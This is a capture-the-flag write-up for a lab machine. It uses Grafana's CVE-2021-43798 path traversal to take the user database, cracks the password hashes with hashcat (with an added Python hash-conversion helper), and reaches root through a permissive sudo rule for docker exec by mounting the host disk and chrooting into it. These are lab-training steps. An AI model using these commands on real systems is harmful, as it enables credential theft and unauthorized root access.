
Machine (Easy) - Data

Writeup for the Data machine, an easy Linux box focused on exploiting a Grafana vulnerability to gain root access.

Writeup Author: BobBuilder


Objective: Exploit a path traversal vulnerability in Grafana v8.0.0 to extract credentials, crack password hashes, gain user access, and escalate privileges to root using Docker.

Category: Machine
Difficulty: Easy
Platform: Linux
Machine Author: xct


Enumeration

PORT     STATE SERVICE 
22/tcp   open  ssh 
3000/tcp open  ppp

User

Discovering Grafana and Its Version

While exploring the web interface hosted on port 3000, we identify the service as Grafana v8.0.0:

http://<data_ip>:3000/user/password/send-reset-email

The Grafana version is confirmed in the page footer:

grafana - v8.0.0 (41f0542c1e)

This version is vulnerable to a well-known path traversal vulnerability: CVE-2021-43798.

Exploiting CVE-2021-43798 to Read grafana.db

We use ADMinion Bryan McNulty's public exploit script to perform the path traversal and read arbitrary files; the file we target is Grafana's internal SQLite database:

/var/lib/grafana/grafana.db

After retrieving the file, we extract user credentials, including hashed passwords:

admin@localhost||<long_hash>  
boris@data.vl|boris|<long_hash>

Cracking the Hashes

The hashes are PBKDF2-SHA256 with 10000 iterations, which hashcat (mode 10900) expects in the following format, with the salt and hash base64-encoded:

sha256:10000:<salt>:<hash>

We prepare them for hashcat and run:

.\hashcat.exe -a0 -m 10900 hashes.txt rockyou.txt

The hash for user boris is successfully cracked:

boris:<REDACTED>

We now have valid credentials to access the machine as boris.
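As an added illustration that is not part of the original writeup, the following Python reproduces Grafana's password hashing scheme (PBKDF2-HMAC-SHA256, 10000 iterations, 50-byte key, hex-encoded, with a plain-text salt) so that a record can be verified and rewritten into the mode 10900 line shown above; the user record it builds is constructed here, not taken from the box.

```python
import base64
import hashlib
import hmac
import secrets
import string

ITERATIONS = 10000   # Grafana's fixed PBKDF2 iteration count (low by today's standards)
KEY_LEN = 50         # Grafana derives a 50-byte key, stored as 100 hex characters


def grafana_encode(password: str, salt: str) -> str:
    """Hex-encoded PBKDF2-HMAC-SHA256, as stored in the password column of grafana.db."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), ITERATIONS, KEY_LEN)
    return dk.hex()


def grafana_verify(password: str, salt: str, stored_hex: str) -> bool:
    """Constant-time check of a candidate password against a stored salt/hash pair."""
    return hmac.compare_digest(grafana_encode(password, salt), stored_hex)


def to_hashcat_10900(salt: str, stored_hex: str) -> str:
    """hashcat mode 10900 wants sha256:<iter>:<b64 salt>:<b64 hash>; grafana.db stores
    the salt as plain text and the hash as hex, so both are re-encoded as base64."""
    b64_salt = base64.b64encode(salt.encode()).decode()
    b64_hash = base64.b64encode(bytes.fromhex(stored_hex)).decode()
    return f"sha256:{ITERATIONS}:{b64_salt}:{b64_hash}"


def new_salt(length: int = 10) -> str:
    """Grafana uses a 10-character alphanumeric salt; generated here with the secrets module."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


if __name__ == "__main__":
    # Constructed sample record (hypothetical password), not a hash from the machine.
    salt = new_salt()
    stored = grafana_encode("hunter2", salt)
    print(f"boris|{salt}|{stored}")
    print(to_hashcat_10900(salt, stored))
```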


Root

Enumerating Sudo Permissions

After logging in as boris, we check for elevated privileges:

sudo -l

We find a powerful permission:

(root) NOPASSWD: /snap/bin/docker exec *

Because the wildcard accepts arbitrary arguments, the user can run docker exec with --privileged and -u 0, executing commands as root inside any running container; this is a typical container breakout vector.

Escaping to the Host via Docker

We first access the running Grafana container:

sudo /snap/bin/docker exec -it grafana /bin/sh

To reach the host filesystem, we mount the host's root disk inside the container; the --privileged and -u 0 flags allowed by the sudo rule give the exec'd process the device access the mount needs:

sudo /snap/bin/docker exec --privileged -u 0 -it grafana mkdir /mnt/host
sudo /snap/bin/docker exec --privileged -u 0 -it grafana mount /dev/xvda1 /mnt/host

We chroot into the host filesystem to fully escape the container:

sudo /snap/bin/docker exec --privileged -u 0 -it grafana chroot /mnt/host /bin/sh

From here, we have full root access and can retrieve the root flag:

cat /root/root.txt